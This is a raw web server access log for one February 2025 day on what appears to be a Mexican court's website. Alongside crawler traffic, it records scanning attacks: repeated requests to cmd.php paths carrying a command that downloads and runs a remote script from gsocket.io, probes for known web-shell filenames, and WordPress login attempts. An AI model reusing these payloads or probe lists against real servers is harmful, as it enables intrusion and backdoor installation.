134.209.102.237 - - [05/Feb/2025:12:36:57 -0600] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:37:32 -0600] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 403 - "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:37:44 -0600] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:37:51 -0600] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:38:16 -0600] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:38:47 -0600] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:39:00 -0600] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:39:08 -0600] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:39:17 -0600] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:39:33 -0600] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:39:48 -0600] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:40:09 -0600] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:40:27 -0600] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:40:40 -0600] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
4.227.36.124 - - [05/Feb/2025:12:41:13 -0600] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.177 - - [05/Feb/2025:12:41:17 -0600] "GET /) HTTP/1.1" 301 236 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
134.209.102.237 - - [05/Feb/2025:12:41:40 -0600] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:42:02 -0600] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:42:15 -0600] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
66.249.77.194 - - [05/Feb/2025:12:42:38 -0600] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:12:42:54 -0600] "GET /sisofi_2018/uploads/09-01-2020/JA-0759-2018-I.pdf HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:43:00 -0600] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:43:18 -0600] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:43:36 -0600] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:43:45 -0600] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:44:07 -0600] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:44:42 -0600] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:44:59 -0600] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:45:21 -0600] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:45:41 -0600] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:46:31 -0600] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
216.244.66.234 - - [05/Feb/2025:12:46:40 -0600] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.234 - - [05/Feb/2025:12:46:41 -0600] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
134.209.102.237 - - [05/Feb/2025:12:46:55 -0600] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:47:09 -0600] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:47:24 -0600] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:47:53 -0600] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:48:16 -0600] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:48:23 -0600] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:48:43 -0600] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:48:57 -0600] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:49:18 -0600] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:49:38 -0600] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:49:49 -0600] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:50:11 -0600] "GET /tmp/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:50:27 -0600] "GET /server/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:51:03 -0600] "GET /uploads/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:51:29 -0600] "GET /upload/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:52:00 -0600] "GET /files/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:52:29 -0600] "GET /file/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:53:09 -0600] "GET /class/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:53:58 -0600] "GET /folders/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 240 "-" "python-requests/2.32.3"
66.249.77.193 - - [05/Feb/2025:13:06:05 -0600] "GET /Noticias&idnoti=475 HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.148.132 - - [05/Feb/2025:13:06:51 -0600] "GET /sisofi/uploads/07-03-2018/INFCOMF15NOV16.pdf HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.77.192 - - [05/Feb/2025:13:07:57 -0600] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
148.113.175.246 - - [05/Feb/2025:13:11:06 -0600] "GET /wp-login.php HTTP/1.1" 301 240 "-" "Go-http-client/1.1"
148.113.175.246 - - [05/Feb/2025:13:11:06 -0600] "POST /wp-login.php HTTP/1.1" 301 240 "http://tjamich.gob.mx/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
66.249.72.137 - - [05/Feb/2025:13:11:33 -0600] "GET /sisofi_2018/uploads/21-10-2021/JA-0300-2019-II.pdf HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.167.144.221 - - [05/Feb/2025:13:14:34 -0600] "GET /sisofi_2018/uploads/17-01-2019/acta_19_inf._reservada.pdf HTTP/1.1" 301 292 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.88.21.235 - - [05/Feb/2025:13:33:58 -0600] "GET / HTTP/1.1" 301 235 "http://www.tjamich.gob.mx/" "DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html)"
216.244.66.234 - - [05/Feb/2025:13:35:34 -0600] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.77.192 - - [05/Feb/2025:13:39:59 -0600] "GET /sisofi_2018/uploads/08-10-2020/MARIO_ALMICAR_GARCIA_SOTO.docx HTTP/1.1" 301 296 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:13:41:44 -0600] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.88.154.204 - - [05/Feb/2025:14:00:25 -0600] "GET /wp-login.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
66.249.77.192 - - [05/Feb/2025:14:12:40 -0600] "GET /134471180 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.155.36 - - [05/Feb/2025:14:30:55 -0600] "GET /sisofi/uploads/05-05-2017/RESOLUCION_JA-0580-2014-I_PRIMERA.pdf HTTP/1.1" 301 294 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.244.66.234 - - [05/Feb/2025:14:33:21 -0600] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.77.193 - - [05/Feb/2025:14:40:07 -0600] "GET /17696060 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:14:42:47 -0600] "GET /92590628 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:15:03:47 -0600] "GET /233599496 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:15:06:21 -0600] "GET /101493368 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:15:08:46 -0600] "GET /168093860 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.193 - - [05/Feb/2025:15:16:09 -0600] "GET /128338592 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:15:18:55 -0600] "GET /49206728 HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
2.59.135.122 - - [05/Feb/2025:15:22:12 -0600] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:17 -0600] "GET /wp-content/plugins/index.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:21 -0600] "GET /wp-admin/network/index.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:25 -0600] "GET /wp-includes/IXR/index.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:31 -0600] "GET /wp-admin/images/index.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:35 -0600] "GET /wp-login.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:39 -0600] "GET /wp-content/plugins/admin.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:42 -0600] "GET /xmlrpc.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:46 -0600] "GET /wp-admin.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:51 -0600] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:22:56 -0600] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:23:03 -0600] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:23:10 -0600] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:23:14 -0600] "GET /WSOEnigma.php HTTP/1.1" 301 240 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:23:18 -0600] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:23:24 -0600] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 301 274 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
2.59.135.122 - - [05/Feb/2025:15:23:27 -0600] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
66.249.77.192 - - [05/Feb/2025:15:23:35 -0600] "GET /product/search229?c=g&l=16233 HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:15:27:46 -0600] "GET /244899260 HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:15:31:02 -0600] "GET /product/brain87?c=g&l=21913 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.155.250 - - [05/Feb/2025:15:40:05 -0600] "GET /sisofi_2018/uploads/07-10-2019/JA-2187-2017-I.pdf HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.72.136 - - [05/Feb/2025:15:45:32 -0600] "GET /sisofi/uploads/27-04-2017/JA-0665-14-II.pdf HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
148.113.175.246 - - [05/Feb/2025:15:47:43 -0600] "GET /wp-login.php HTTP/1.1" 301 240 "-" "Go-http-client/1.1"
148.113.175.246 - - [05/Feb/2025:15:47:43 -0600] "POST /wp-login.php HTTP/1.1" 301 240 "http://tjamich.gob.mx/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
66.249.72.137 - - [05/Feb/2025:15:51:51 -0600] "GET /sisofi/uploads/09-04-2019/CPEUM_ULTIMA_REFORMA_MARZO_2019.pdf HTTP/1.1" 301 292 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
77.221.149.92 - - [05/Feb/2025:16:03:53 -0600] "GET /wp-login.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
216.244.66.234 - - [05/Feb/2025:16:11:43 -0600] "GET /robots.txt HTTP/1.1" 301 245 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.72.136 - - [05/Feb/2025:16:16:19 -0600] "GET /sisofi/uploads/09-04-2019/JA-0258-2018-II.pdf HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
109.199.118.129 - - [05/Feb/2025:16:34:47 -0600] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
66.249.77.193 - - [05/Feb/2025:16:41:13 -0600] "GET /item/owcp239kqseg23179.html HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.194 - - [05/Feb/2025:16:43:08 -0600] "GET /product/brush87?c=g&l=20439 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.192 - - [05/Feb/2025:16:45:03 -0600] "GET /item/yyxmb56wpbml27421.html HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.19.75.123 - - [05/Feb/2025:16:48:19 -0600] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
